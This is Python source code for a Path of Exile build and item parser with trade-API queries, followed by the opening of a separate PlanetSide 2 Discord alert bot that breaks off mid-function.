            if "critical strike chance" in text and isinstance(item, Weapon):
                stats['cc'] += int(text.split(' ')[0][:-1])
            if "damage" in text and isinstance(item, Weapon):
                if 'lightning' in text:
                    stats['light inc'] += int(text.split(' ')[0][:-1])
                if 'cold' in text:
                    stats['cold inc'] += int(text.split(' ')[0][:-1])
                if 'fire' in text:
                    stats['fire inc'] += int(text.split(' ')[0][:-1])
                if 'chaos' in text:
                    stats['chaos inc'] += int(text.split(' ')[0][:-1])
                if 'physical' in text:
                    stats['phys inc'] += int(text.split(' ')[0][:-1])

    if item.implicits:
        for stat in unescape_to_list(item.implicits):
            _accumulate(stat)
    if item.explicits:
        for stat in unescape_to_list(item.explicits):
            _accumulate(stat)
    if 'weapon' in item.tags:
        if stats['aspd']:
            _as = float(ensure_rangeless(item.attack_speed))
            item.attack_speed = f"{(_as + (stats['aspd'] / 100) * _as):.2}"
        if stats['cc']:
            # Base crit is assumed to be 5.0% — TODO confirm per-base value.
            cc = 5.0
            cc += cc * (stats['cc'] / 100)
            item.critical_chance = f"{cc:.2}%"
        if stats['range']:
            i_range = int(ensure_rangeless(item.range))
            i_range += stats['range']
            item.range = f"{i_range}"
        # For each element: flat added damage replaces the base min/max,
        # then %-increased scales both ends.
        if stats['fire max'] or stats['fire inc']:
            if stats['fire max']:
                item.fire_min = stats['fire low']
                item.fire_max = stats['fire max']
            fire_m = int(ensure_rangeless(item.fire_min))
            fire_mx = int(ensure_rangeless(item.fire_max))
            fire_m += fire_m * (stats['fire inc'] / 100)
            fire_mx += fire_mx * (stats['fire inc'] / 100)
            item.fire_min = str(round(fire_m))
            item.fire_max = str(round(fire_mx))
        if stats['cold max'] or stats['cold inc']:
            if stats['cold max']:
                item.cold_min = stats['cold low']
                item.cold_max = stats['cold max']
            cold_m = int(ensure_rangeless(item.cold_min))
            cold_mx = int(ensure_rangeless(item.cold_max))
            cold_m += cold_m * (stats['cold inc'] / 100)
            cold_mx += cold_mx * (stats['cold inc'] / 100)
            item.cold_min = str(round(cold_m))
            item.cold_max = str(round(cold_mx))
        if stats['light max'] or stats['light inc']:
            if stats['light max']:
                item.lightning_min = stats['light low']
                item.lightning_max = stats['light max']
            lightning_m = int(ensure_rangeless(item.lightning_min))
            lightning_mx = int(ensure_rangeless(item.lightning_max))
            lightning_m += lightning_m * (stats['light inc'] / 100)
            lightning_mx += lightning_mx * (stats['light inc'] / 100)
            item.lightning_min = str(round(lightning_m))
            item.lightning_max = str(round(lightning_mx))
        if stats['chaos max'] or stats['chaos inc']:
            if stats['chaos max']:
                item.chaos_min = stats['chaos low']
                item.chaos_max = stats['chaos max']
            chaos_m = int(ensure_rangeless(item.chaos_min))
            chaos_mx = int(ensure_rangeless(item.chaos_max))
            chaos_m += chaos_m * (stats['chaos inc'] / 100)
            chaos_mx += chaos_mx * (stats['chaos inc'] / 100)
            item.chaos_min = str(round(chaos_m))
            item.chaos_max = str(round(chaos_mx))
        if stats['phys max'] or stats['phys inc']:
            # Physical adds to the existing base roll instead of replacing.
            physical_m = int(ensure_rangeless(item.physical_min)) + stats['phys low']
            physical_mx = int(ensure_rangeless(item.physical_max)) + stats['phys max']
            physical_m += physical_m * (stats['phys inc'] / 100)
            physical_mx += physical_mx * (stats['phys inc'] / 100)
            item.physical_min = str(round(physical_m))
            item.physical_max = str(round(physical_mx))
    else:
        try:
            if item.armour:
                arm = int(ensure_rangeless(item.armour))
                arm += stats['flat armour']
                arm += (stats['inc armour'] / 100) * arm
                item.armour = str(round(arm))
        except Exception:
            # Items without defence attributes (e.g. jewellery) bail out here.
            return
        if item.evasion:
            ev = int(ensure_rangeless(item.evasion))
            ev += stats['flat evasion']
            ev += (stats['inc evasion'] / 100) * ev
            item.evasion = str(round(ev))
        if item.energy_shield:
            es = int(ensure_rangeless(item.energy_shield))
            es += stats['flat es']
            es += (stats['inc es'] / 100) * es
            item.energy_shield = str(round(es))
        if "shield" in item.tags:
            block = int(ensure_rangeless(item.block))
            block += stats['block']
            item.block = str(round(block))
def _get_wiki_base(item, object_dict, cl, slot, char_api=False, thread_exc_queue=None):
    """Resolve a parsed item dict against the wiki client and store the result.

    Looks up *item* (a dict produced by PoB parsing or the character API)
    through *cl* and writes the resulting wiki item object into
    ``object_dict[slot]``.  Designed to run on a worker thread: lookup
    failures are reported through *thread_exc_queue* (when provided) rather
    than raised.

    Args:
        item: Mapping describing one item (rarity, name, base, mods, ...).
        object_dict: Shared dict the result is written into, keyed by slot.
        cl: Wiki API client exposing ``find_items``.
        slot: Equipment slot name used as the key in *object_dict*.
        char_api: True when *item* came from the official character API
            (its field names differ slightly from PoB-parsed items).
        thread_exc_queue: Optional ``queue.Queue`` for reporting failures.
    """
    # NOTE(review): this try/assert is a no-op — any failure is swallowed.
    try:
        assert item['rarity'].lower()
    except Exception:
        pass
    if item['rarity'].lower() in ['unique', 'relic'] and char_api:
        # Character-API unique/relic: look up directly by unique name.
        try:
            wiki_base = cl.find_items({'name': item['name']})[0]
        except IndexError:
            ex = AbsentItemBaseException(f"Could not find {item['name']}")
            if thread_exc_queue:
                thread_exc_queue.put(ex)
            return
        # NOTE(review): dead check — both branches do nothing.
        if not wiki_base:
            pass
        # Copy the concrete rolled values from the API item onto the wiki object.
        if isinstance(wiki_base, Weapon):
            wiki_base.attack_speed = item.get('attack_speed', 0)
            wiki_base.chaos_min = item.get('chaos_min', 0)
            wiki_base.chaos_max = item.get('chaos_max', 0)
            wiki_base.cold_min = item.get('cold_min', 0)
            wiki_base.cold_max = item.get('cold_max', 0)
            wiki_base.fire_min = item.get('fire_min', 0)
            wiki_base.fire_max = item.get('fire_max', 0)
            wiki_base.lightning_min = item.get('lightning_min', 0)
            wiki_base.lightning_max = item.get('lightning_max', 0)
            wiki_base.physical_min = item.get('physical_min', 0)
            wiki_base.physical_max = item.get('physical_max', 0)
            wiki_base.range = item.get('range', 0)
            wiki_base.critical_chance = item.get('critical_chance', 0)
        elif isinstance(wiki_base, Armour):
            wiki_base.armour = item.get('armour', 0)
            wiki_base.evasion = item.get('evasion', 0)
            wiki_base.energy_shield = item.get('energy_shield', 0)
        if item['rarity'].lower() == 'relic':
            wiki_base.rarity = 'relic'
    elif item['rarity'].lower() in ['unique', 'relic']:
        # PoB unique/relic: fetch both the unique and its base type so stats
        # missing from the unique entry can be backfilled from the base.
        real_base = cl.find_items({'name': item['base']})[0]
        try:
            wiki_base = cl.find_items({'name': item['name']})[0]
        except IndexError:
            wiki_base = real_base
        wiki_base.implicits = item['implicits']
        wiki_base.explicits = item['stats']
        wiki_base.name = item['name']
        wiki_base.base = item['base']
        wiki_base.rarity = item['rarity']
        if isinstance(wiki_base, Weapon):
            wiki_base.attack_speed = real_base.attack_speed
            wiki_base.chaos_min = real_base.chaos_min
            wiki_base.chaos_max = real_base.chaos_max
            wiki_base.cold_min = real_base.cold_min
            wiki_base.cold_max = real_base.cold_max
            wiki_base.fire_min = real_base.fire_min
            wiki_base.fire_max = real_base.fire_max
            wiki_base.lightning_min = real_base.lightning_min
            wiki_base.lightning_max = real_base.lightning_max
            # Keep the higher physical roll of unique vs. base entry.
            if real_base.physical_min > wiki_base.physical_min:
                wiki_base.physical_min = real_base.physical_min
            if real_base.physical_max > wiki_base.physical_max:
                wiki_base.physical_max = real_base.physical_max
            wiki_base.range = real_base.range
            wiki_base.critical_chance = real_base.critical_chance
        elif isinstance(wiki_base, Armour):
            wiki_base.armour = real_base.armour
            wiki_base.evasion = real_base.evasion
            wiki_base.energy_shield = real_base.energy_shield
        if item['rarity'].lower() == 'relic':
            wiki_base.rarity = 'relic'
    elif "Flask" in item['base']:
        # Flasks are not resolved to wiki objects.
        return
    else:
        # Normal/magic/rare: derive the plain base name and look that up.
        if item['rarity'].lower() == 'magic' and item['name'] == item['base']:
            if '' in item['stats']:
                item['stats'].remove('')
            item['base'] = get_base_from_magic(item['base'])
        # Strip words containing digits (e.g. stack counts) from the base name.
        wl = []
        for w in item['base'].split(' '):
            if not any(char.isdigit() for char in w):
                wl.append(w)
        try:
            wiki_base = cl.find_items({'name': ' '.join(wl).replace("Synthesised", "").strip()})[0]
        except IndexError:
            ex = AbsentItemBaseException(f"Could not find {item['name']}")
            if thread_exc_queue:
                thread_exc_queue.put(ex)
            return
        wiki_base.rarity = item['rarity']
        wiki_base.name = item['name']
        wiki_base.base = item['base']
    # Mods: character-API items use 'implicits'/'explicits'; PoB items use
    # 'implicits'/'stats'.
    if char_api:
        if item['implicits']:
            wiki_base.implicits = '<br>'.join(item['implicits'])
        if item['explicits']:
            wiki_base.explicits = '<br>'.join(item['explicits'])
    else:
        # NOTE(review): empty try/except — dead code.
        try:
            pass
        except Exception:
            pass
        if item['implicits']:
            wiki_base.implicits = '<br>'.join(item['implicits'])
        if item['stats']:
            wiki_base.explicits = '<br>'.join(item['stats'])
    if item['enchant']:
        wiki_base.enchant = item['enchant']
    wiki_base.quality = item['quality']
    # Apply local mods to base defences/damage, except for slots that have
    # no base combat stats (jewellery, quivers, flasks, jewels).
    if wiki_base.rarity.lower() not in ['unique', 'relic'] and char_api or char_api is False:
        if wiki_base.quality == '' or "ring" in wiki_base.tags or "amulet" in wiki_base.tags \
                or "belt" in wiki_base.tags or "quiver" in wiki_base.tags or "flask" in wiki_base.tags \
                or "jewel" in wiki_base.tags:
            pass
        else:
            modify_base_stats(wiki_base)
    # Translate influence strings into the wiki object's influence list.
    if item['special']:
        for influence in item['special']:
            if influence == "Shaper Item":
                wiki_base.influences.append("shaper")
            elif influence == "Elder Item":
                wiki_base.influences.append("elder")
            elif influence == "Redeemer Item":
                wiki_base.influences.append("redeemer")
            elif influence == "Crusader Item":
                wiki_base.influences.append("crusader")
            elif influence == "Warlord Item":
                wiki_base.influences.append("warlord")
            elif influence == "Hunter Item":
                wiki_base.influences.append("hunter")
    object_dict[slot] = wiki_base
def parse_pob_xml(xml: str, cl=None):
    """Parse a Path of Building XML export into a stats/equipment dict.

    Args:
        xml: Raw PoB XML document text.
        cl: Optional wiki API client; when given, each equipped item is also
            resolved to a wiki object on a worker thread (see _get_wiki_base).

    Returns:
        Dict with keys such as 'equipped', 'keystones', 'asc_nodes', 'trees',
        'jewels', 'bandit', 'class', and many PlayerStat-derived values.

    Raises:
        OutdatedPoBException: When expected Build attributes/stats are absent.
    """
    tree = Etree.ElementTree(Etree.fromstring(xml))
    equipped = {}
    slots = tree.findall('Items/Slot')
    for slot in slots:
        # Skip jewel sockets; only real gear slots are collected here.
        if 'socket' in slot.attrib['name'].lower():
            continue
        equipped[slot.attrib['name']] = {}
        equipped[slot.attrib['name']]['id'] = slot.attrib['itemId']
    if cl:
        obj_dict = {}
        threads = []
        # NOTE(review): exc_queue is never passed to _get_wiki_base below
        # (its thread_exc_queue parameter defaults to None), so the empty()
        # check after join() can never fire — confirm whether the queue was
        # meant to be included in the Thread args.
        exc_queue = Queue()
        for slot in equipped:
            item_id = equipped[slot]['id']
            tree_item = tree.find(f'Items/Item[@id="{item_id}"]')
            # Keep only the mod lines matching the item's selected variant.
            if 'variant' in tree_item.attrib:
                lines = tree_item.text.replace('\t', '').split('\n')
                for line in lines[:]:
                    if line.startswith('{variant'):
                        variant = line.split('variant:')[1][0]
                        if variant != tree_item.attrib['variant']:
                            lines.remove(line)
                tree_item.text = '\n'.join(lines)
            equipped[slot]['raw'] = tree_item.text.replace('\t', '')
            try:
                equipped[slot]['parsed'] = parse_pob_item(equipped[slot]['raw'])
            except Exception:
                # Unparseable item: leave the slot without 'parsed'/'object'.
                continue
            item = equipped[slot]['parsed']
            t = threading.Thread(target=_get_wiki_base, args=(item, obj_dict, cl, slot))
            threads.append(t)
            t.start()
        for thread in threads:
            thread.join()
        if not exc_queue.empty():
            raise exc_queue.get()
        for slot in obj_dict:
            equipped[slot]['object'] = obj_dict[slot]
    # Attach socketed-gem info either to the owning slot or, for slotless
    # skills, into a name-keyed 'gem_groups' mapping.
    skill_slots = tree.findall('Skills/Skill')
    for skill in skill_slots:
        if 'slot' in skill.attrib:
            slot = skill.attrib['slot']
            if slot in equipped:
                equipped[slot]['gems'] = []
                lst = equipped[slot]['gems']
            else:
                continue
        else:
            if 'gem_groups' not in equipped:
                equipped['gem_groups'] = {}
            # NOTE(review): Element.getchildren() was removed in Python 3.9;
            # list(skill) is the modern equivalent — confirm target version.
            try:
                if not skill.getchildren()[0].attrib['nameSpec'] in equipped['gem_groups']:
                    equipped['gem_groups'][skill.getchildren()[0].attrib['nameSpec']] = []
            except Exception:
                continue
            lst = equipped['gem_groups'][skill.getchildren()[0].attrib['nameSpec']]
        gems = skill.getchildren()
        for gem in gems:
            gem_d = {
                'name': gem.attrib['nameSpec'],
                'level': gem.attrib['level'],
                'enabled': gem.attrib['enabled'],
                'quality': gem.attrib['quality']
            }
            lst.append(gem_d)
    stats = {}
    # Decode the active passive tree from the base64 payload at the end of
    # its URL: after a 7-byte header, each allocated node is a big-endian
    # 16-bit integer.
    active_spec = int(tree.find('Tree').attrib['activeSpec']) - 1
    current_tree = tree.findall('Tree/Spec')[active_spec]
    tree_base64 = current_tree.find('URL').text.replace('\t', '').replace('\n', '').rsplit('/', 1)[1]
    byte_tree = binascii.a2b_base64(tree_base64.replace('-', '+').replace('_', '/'))
    pos = 7
    total_nodes = (len(byte_tree) - 7) // 2
    nodes = []
    for _ in range(total_nodes):
        nodes.append(str(int.from_bytes(byte_tree[pos:pos + 2], byteorder='big')))
        pos += 2
    stats['keystones'] = []
    stats['asc_nodes'] = []
    for node in nodes:
        if node in keystones:
            stats['keystones'].append(keystones[node])
        if node in asc_nodes:
            stats['asc_nodes'].append(asc_nodes[node])
    stats['trees'] = {}
    for spec in tree.findall('Tree/Spec'):
        name = spec.attrib['title'] if 'title' in spec.attrib else 'Default'
        stats['trees'][name] = spec.find('URL').text.replace('\t', '').replace('\n', '').replace('/passive', '/fullscreen-passive')
    stats['jewels'] = []
    jewel_sockets = current_tree.findall('Sockets/Socket')
    for socket in jewel_sockets:
        # itemId "0" marks an empty jewel socket.
        if socket.attrib['itemId'] != "0":
            item_id = socket.attrib['itemId']
            parsed = parse_pob_item(tree.find(f'Items/Item[@id="{item_id}"]').text.replace('\t', ''))
            stats['jewels'].append(parsed)
    stats['equipped'] = equipped
    try:
        stats['bandit'] = tree.find('Build').attrib['bandit']
    except Exception:
        stats['bandit'] = "None"
    try:
        stats['class'] = tree.find('Build').attrib.get('className', "None")
        stats['ascendancy'] = tree.find('Build').attrib.get('ascendClassName', "None")
        # Newer PoB exports report CombinedDPS; older ones only TotalDPS.
        try:
            stats['total_dps'] = tree.find('Build/PlayerStat[@stat="CombinedDPS"]').attrib['value']
        except Exception:
            stats['total_dps'] = tree.find('Build/PlayerStat[@stat="TotalDPS"]').attrib['value']
        stats['level'] = tree.find('Build').attrib['level']
        try:
            main_group = int(tree.find('Build').attrib.get('mainSocketGroup', 1))
            skill_in_group = int(skill_slots[main_group - 1].attrib.get('mainActiveSkill', 1))
            stats['main_skill'] = skill_slots[main_group - 1].getchildren()[skill_in_group - 1].attrib['nameSpec']
        except Exception:
            stats['main_skill'] = " "
        stats['crit_chance'] = tree.find('Build/PlayerStat[@stat="PreEffectiveCritChance"]').attrib['value']
        stats['effective_crit_chance'] = tree.find('Build/PlayerStat[@stat="CritChance"]').attrib['value']
        stats['chance_to_hit'] = tree.find('Build/PlayerStat[@stat="HitChance"]').attrib['value']
        stats['str'] = tree.find('Build/PlayerStat[@stat="Str"]').attrib['value']
        stats['dex'] = tree.find('Build/PlayerStat[@stat="Dex"]').attrib['value']
        stats['int'] = tree.find('Build/PlayerStat[@stat="Int"]').attrib['value']
        stats['life'] = tree.find('Build/PlayerStat[@stat="Life"]').attrib['value']
        stats['life_regen'] = tree.find('Build/PlayerStat[@stat="LifeRegen"]').attrib['value']
        stats['es'] = tree.find('Build/PlayerStat[@stat="EnergyShield"]').attrib['value']
        stats['es_regen'] = tree.find('Build/PlayerStat[@stat="EnergyShieldRegen"]').attrib['value']
        try:
            stats['degen'] = tree.find('Build/PlayerStat[@stat="TotalDegen"]').attrib['value']
        except AttributeError:
            stats['degen'] = "0"
        stats['evasion'] = tree.find('Build/PlayerStat[@stat="Evasion"]').attrib['value']
        stats['block'] = tree.find('Build/PlayerStat[@stat="BlockChance"]').attrib['value']
        stats['spell_block'] = tree.find('Build/PlayerStat[@stat="SpellBlockChance"]').attrib['value']
        stats['dodge'] = tree.find('Build/PlayerStat[@stat="AttackDodgeChance"]').attrib['value']
        stats['spell_dodge'] = tree.find('Build/PlayerStat[@stat="SpellDodgeChance"]').attrib['value']
        stats['fire_res'] = tree.find('Build/PlayerStat[@stat="FireResist"]').attrib['value']
        stats['cold_res'] = tree.find('Build/PlayerStat[@stat="ColdResist"]').attrib['value']
        stats['light_res'] = tree.find('Build/PlayerStat[@stat="LightningResist"]').attrib['value']
        stats['chaos_res'] = tree.find('Build/PlayerStat[@stat="ChaosResist"]').attrib['value']
        try:
            stats['power_charges'] = tree.find('Build/PlayerStat[@stat="PowerChargesMax"]').attrib['value']
        except Exception:
            stats['power_charges'] = '3'
        try:
            stats['frenzy_charges'] = tree.find('Build/PlayerStat[@stat="FrenzyChargesMax"]').attrib['value']
        except Exception:
            stats['frenzy_charges'] = '3'
        try:
            stats['endurance_charges'] = tree.find('Build/PlayerStat[@stat="EnduranceChargesMax"]').attrib['value']
        except Exception:
            stats['endurance_charges'] = '3'
    except AttributeError:
        # tree.find(...) returned None for a required stat: old PoB export.
        raise OutdatedPoBException()
    return stats
def parse_poe_char_api(json, cl, items_only=False):
    """Convert an official character-API JSON payload into the internal format.

    Args:
        json: Decoded API response; must contain 'items', optionally
            'character'.
        cl: Wiki API client passed through to _get_wiki_base worker threads.
        items_only: When True, every item is collected under the single
            'Item' slot rather than mapped to equipment slots.

    Returns:
        Dict with 'equipped' (slot -> item info) plus character metadata
        ('level', 'class', ...) when 'character' is present in *json*.
    """
    # frameType -> rarity name mapping used by the API.
    rarity = {
        0: "Normal",
        1: "Magic",
        2: "Rare",
        3: "Unique",
        4: "Gem"
    }
    equipped = {}
    threads = []
    obj_dict = {}
    for item in json['items']:
        # TODO: Find a more idiomatic way to do this
        # As it is now, this dict should only ever contain values of type `int`
        char_item = defaultdict(int)
        # NOTE(review): due to operator precedence this reads as
        # (items_only and 'Prophecy' in icon) or ('Divination' in icon),
        # so Divination cards take this branch even when items_only is False
        # — confirm whether parentheses were intended.
        if items_only and 'Prophecy' in item['icon'] or 'Divination' in item['icon']:
            equipped['Item'] = item
            continue
        char_item['rarity'] = rarity[item['frameType']]
        char_item['name'] = item["name"].split('>>')[-1]
        if 'properties' in item:
            for prop in item['properties']:
                if prop['name'] == "Quality":
                    # Quality arrives as e.g. "+20%": strip the '+' and '%'.
                    char_item['quality'] = int(prop['values'][0][0][1:-1])
                # Weapon stats
                if prop['name'] == "Physical Damage":
                    char_item['physical_min'] = prop['values'][0][0].split('-')[0]
                    char_item['physical_max'] = prop['values'][0][0].split('-')[1]
                if prop['name'] == "Fire Damage":
                    char_item['fire_min'] = prop['values'][0][0].split('-')[0]
                    char_item['fire_max'] = prop['values'][0][0].split('-')[1]
                if prop['name'] == "Cold Damage":
                    char_item['cold_min'] = prop['values'][0][0].split('-')[0]
                    char_item['cold_max'] = prop['values'][0][0].split('-')[1]
                if prop['name'] == "Lightning Damage":
                    char_item['lightning_min'] = prop['values'][0][0].split('-')[0]
                    char_item['lightning_max'] = prop['values'][0][0].split('-')[1]
                if prop['name'] == "Chaos Damage":
                    char_item['chaos_min'] = prop['values'][0][0].split('-')[0]
                    char_item['chaos_max'] = prop['values'][0][0].split('-')[1]
                if prop['name'] == "Critical Strike Chance":
                    char_item['critical_chance'] = prop['values'][0][0]
                if prop['name'] == "Attacks per Second":
                    char_item['attack_speed'] = prop['values'][0][0]
                if prop['name'] == "Weapon Range":
                    char_item['range'] = prop['values'][0][0]
                # Armour Stats
                if prop['name'] == "Armour":
                    char_item['armour'] = prop['values'][0][0]
                if prop['name'] == "Energy Shield":
                    char_item['energy_shield'] = prop['values'][0][0]
                if prop['name'] == "Evasion":
                    char_item['evasion'] = prop['values'][0][0]
        # Items without a unique name fall back to their type line.
        if char_item['name'] == '':
            char_item['name'] = item["typeLine"]
            if char_item['rarity'] == "Magic":
                char_item['base'] = get_base_from_magic(item['typeLine'])
            else:
                char_item['base'] = item["typeLine"]
        # Map the API inventoryId onto the slot names used internally.
        if items_only:
            slot = "Item"
        elif 'Ring' in item['inventoryId']:
            slot = "Ring 2" if "2" in item['inventoryId'] else "Ring 1"
        elif item['inventoryId'] == "Offhand":
            slot = "Weapon 2"
        elif item['inventoryId'] == "Weapon":
            slot = "Weapon 1"
        elif item['inventoryId'] == "Helm":
            slot = "Helmet"
        elif item['inventoryId'] == "BodyArmour":
            slot = "Body Armour"
        elif item['inventoryId'] == "Flask":
            # Flask slots are 1-based; item['x'] is the 0-based position.
            slot = f"Flask {int(item['x']) + 1}"
            char_item['name'] = item["typeLine"].split('>>')[-1]
            if item['frameType'] == 1 and 'Flask of' in char_item['name']:
                char_item['rarity'] = "Magic"
        elif item['inventoryId'] in ['Amulet', 'Helm', 'Gloves', 'Belt', 'Flask', 'Boots', 'Weapon', 'PassiveJewels']:
            slot = item['inventoryId']
        else:
            continue
        if 'implicitMods' in item:
            char_item['implicits'] = item['implicitMods']
        else:
            char_item['implicits'] = []
        if 'explicitMods' in item:
            char_item['explicits'] = item['explicitMods']
        else:
            char_item['explicits'] = []
        if 'craftedMods' in item:
            for mod in item['craftedMods']:
                # FIXME: unresolved attribute
                char_item['explicits'].append("{crafted}"f"{mod}")
        if 'corrupted' in item:
            # FIXME: unresolved attribute
            char_item['explicits'].append('Corrupted')
        if 'enchantMods' in item:
            char_item['implicits'] = ["{crafted}" + item['enchantMods'][0]]
        # NOTE(review): this reset runs for every item, so for list-valued
        # slots (PassiveJewels / items_only) previously appended entries are
        # clobbered and only the last item survives — confirm intent.
        equipped[slot] = {}
        if slot == 'PassiveJewels' or items_only:
            if type(equipped[slot]) is dict:
                equipped[slot] = []
            equipped[slot].append(char_item)
        else:
            equipped[slot] = char_item
        if 'socketedItems' in item and not items_only:
            # Collect socketed gems (frameType 4) with level/quality info.
            equipped[slot]['gems'] = []
            for socketed in item['socketedItems']:
                if socketed['frameType'] == 4:
                    gem_d = {'name': socketed['typeLine']}
                    for prop in socketed['properties']:
                        if prop['name'] == 'Quality':
                            gem_d['quality'] = prop['values'][0][0].replace('+', '').replace('%', '')
                        if prop['name'] == 'Level':
                            gem_d['level'] = prop['values'][0][0]
                    if 'quality' not in gem_d:
                        gem_d['quality'] = 0
                    equipped[slot]['gems'].append(gem_d)
        # Resolve the item against the wiki on a worker thread (jewels and
        # flasks are skipped).
        if slot != 'PassiveJewels' and 'Flask' not in slot:
            t = threading.Thread(target=_get_wiki_base, args=(char_item, obj_dict, cl, slot, True))
            threads.append(t)
            t.start()
    for thread in threads:
        thread.join()
    if items_only:
        equipped["items_objects"] = []
    for slot in obj_dict:
        if not items_only:
            equipped[slot]['object'] = obj_dict[slot]
        else:
            equipped["items_objects"] = obj_dict[slot]
    stats = {'equipped': equipped}
    if 'character' in json:
        stats['level'] = json['character']['level']
        stats['ascendancy'] = json['character']['ascendancyClass']
        stats['class'] = json['character']['class']
        stats['charname'] = json['character']['name']
        stats['league'] = json['character']['league']
    return stats
def get_base_from_magic(name: str):
    """Strip the prefix word and 'of ...' suffix from a magic item name.

    E.g. "Shimmering Sapphire Ring of Success" -> "Sapphire Ring".
    """
    before_suffix = name.split("of")[0]
    after_apostrophe = before_suffix.split("'")[-1]
    words = after_apostrophe.split()
    return ' '.join(words[1:])
def poe_skill_tree(hashes, asc: str = "None", return_keystones=False, return_asc=False):
    """Build a pathofexile.com fullscreen passive-tree URL from node hashes.

    Depending on the two flags, also returns the keystone names and/or
    ascendancy node names found among *hashes*.
    """
    class_ids = {
        "marauder": 1,
        "ranger": 2,
        "witch": 3,
        "duelist": 4,
        "templar": 5,
        "shadow": 6,
        "scion": 7
    }
    asc_ids = {
        "marauder": {
            "none": 0,
            "juggernaut": 1,
            "berserker": 2,
            "chieftain": 3
        },
        "ranger": {
            "none": 0,
            "raider": 1,
            "deadeye": 2,
            "pathfinder": 3
        },
        "witch": {
            "none": 0,
            "occultist": 1,
            "elementalist": 2,
            "necromancer": 3
        },
        "duelist": {
            "none": 0,
            "slayer": 1,
            "gladiator": 2,
            "champion": 3
        },
        "templar": {
            "none": 0,
            "inquisitor": 1,
            "hierophant": 2,
            "guardian": 3
        },
        "shadow": {
            "none": 0,
            "assassin": 1,
            "trickster": 2,
            "saboteur": 3
        },
        "scion": {
            "none": 0,
            "ascendant": 1
        }
    }
    # Payload layout (reverse engineered): bytes 0-3 carry the tree/b64
    # format version, byte 4 the character class, byte 5 the ascendancy,
    # byte 6 is believed to relate to start/exit nodes.  Each allocated
    # node follows as a big-endian 16-bit integer.
    payload = bytearray([0, 0, 0, 4])
    asc = asc.lower()
    # *asc* may name either an ascendancy (find its class) or a base class.
    char_class = next((c for c in asc_ids if asc in asc_ids[c]), None)
    if not char_class:
        char_class, asc = asc, "none"
    payload.append(class_ids[char_class])
    payload.append(asc_ids[char_class][asc.lower()])
    payload.append(0)
    for node_hash in hashes:
        payload += node_hash.to_bytes(2, 'big')
    # URL-safe base64 variant expected by pathofexile.com.
    encoded = binascii.b2a_base64(payload).decode().replace('+', '-').replace('/', '_')
    url = f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{encoded}"
    tree_keystones = [keystones[str(h)] for h in hashes if str(h) in keystones]
    ascendancy = [asc_nodes[str(h)] for h in hashes if str(h) in asc_nodes]
    if return_keystones and return_asc:
        return url, tree_keystones, ascendancy
    if return_keystones:
        return url, tree_keystones
    if return_asc:
        return url, ascendancy
    return url
def get_active_leagues():
    """Fetch the list of currently active trade leagues from the official API.

    Raises:
        RequestException: If the API does not answer with HTTP 200.
    """
    pool = urllib3.PoolManager()
    response = pool.request('GET', 'https://www.pathofexile.com/api/trade/data/leagues')
    if response.status != 200:
        raise RequestException(response.data.decode('utf-8'))
    return js.loads(response.data.decode('utf-8'))['result']
def _trade_api_query(data, league, endpoint):
    """POST a query to the official PoE trade API and fetch listing details.

    Args:
        data: JSON-serializable query payload.
        league: League name interpolated into the API path.
        endpoint: API endpoint name, e.g. 'search' or 'exchange'.

    Returns:
        The 'result' list of listing details (first 10 listing ids only).

    Raises:
        RequestException: If either HTTP call does not return status 200.
    """
    http = urllib3.PoolManager()
    # BUG FIX: removed a leftover debug print() of the serialized request body.
    resp = http.request(
        'POST', f'https://www.pathofexile.com/api/trade/{endpoint}/{league}',
        body=js.dumps(data).encode('utf-8'), headers={'Content-Type': 'application/json'}
    )
    if resp.status != 200:
        raise RequestException(resp.data.decode('utf-8'))
    json_result = js.loads(resp.data.decode('utf-8'))
    listing_ids = json_result['result']
    # Only the first 10 listing ids are passed to the fetch endpoint.
    entries = http.request('GET', f'https://www.pathofexile.com/api/trade/fetch/{",".join(listing_ids[:10])}')
    if entries.status != 200:
        raise RequestException(entries.data.decode('utf-8'))
    return js.loads(entries.data.decode('utf-8'))['result']
def currency_rates(have: str, want: str, league: str):
    """Query the bulk-exchange trade API for have -> want currency listings."""
    query = {
        "exchange": {
            "status": {"option": "online"},
            "have": [have],
            "want": [want]
        }
    }
    listings = _trade_api_query(query, league, 'exchange')
    return CurrencyQuery(have, want, league, listings)
def item_price(item, league):
    """Search the trade API for *item* listings in *league*, cheapest first."""
    query = {
        "query": {
            "term": item,
            "status": {"option": "online"}
        },
        "sort": {"price": "asc"},
    }
    listings = _trade_api_query(query, league, 'search')
    return ItemPriceQuery(item, league, listings)
|
ps2_alert_bot.py | import discord, json, math, schedule, time, sys, os
from dotenv import load_dotenv
from datetime import datetime
import urllib.request as urlreq
import threading
import asyncio
# Module-level flag gating both background check loops; toggled by the
# "?enable notifications" / "?disable notifications" commands in main().
checking_enabled = False
def getEventInfo(serverNumber):
    """Query the Daybreak census API for the latest METAGAME event on a world.

    Args:
        serverNumber: Census world id (e.g. 13 for Cobalt).

    Returns:
        "N/A" when data could not be retrieved/parsed or no event exists,
        "ENDED" when the most recent event has finished, otherwise a tuple
        (event_name, event_description, running_time_minutes, factionPercentage).
    """
    try:
        with urlreq.urlopen(
            f"https://census.daybreakgames.com/get/ps2:v2/world_event/?type=METAGAME&world_id={serverNumber}&c:limit=1", timeout=10) as url:
            data = json.loads(url.read().decode())
    except (urlreq.HTTPError, urlreq.URLError) as error:
        print(f"An error occured while retrieving the data from API: {error}")
        return "N/A"
    event_state = None
    try:
        for p in data['world_event_list']:
            event_id = int(p['metagame_event_id'])
            timestamp = int(p['timestamp'])
            event_state = p["metagame_event_state_name"]
            factionPercentage = []
            factionPercentage.append("🟦 NC: " + p["faction_nc"][0:4] + "%")
            factionPercentage.append("🟥 TR: " + p["faction_tr"][0:4] + "%")
            factionPercentage.append("🟪 VS: " + p["faction_vs"][0:4] + "%")
    except KeyError:
        console_print("An error occured while parsing the json file")
        print(data)
        return "N/A"
    # BUG FIX: an empty 'world_event_list' used to leave event_id/timestamp
    # unbound and crash with NameError further down.
    if event_state is None:
        print("no event running")
        return "N/A"
    try:
        filepath = os.path.dirname(os.path.abspath(__file__))
        filepath = os.path.join(filepath, "metagame_event.json")
        with open(filepath, "r") as f:
            eventy_txt = f.read()
        eventy_json = json.loads(eventy_txt)
    # BUG FIX: was a bare 'except:'; catch only file and JSON decode errors.
    except (OSError, json.JSONDecodeError):
        print("Error reading the file metagame_event.json")
        return "N/A"
    # Minutes elapsed since the event started, formatted for the embed.
    current_time = math.ceil(datetime.now().timestamp())
    running_time = str(round((current_time - timestamp) / 60, 2))
    if event_state == "ended":
        return "ENDED"
    if event_state == "started":
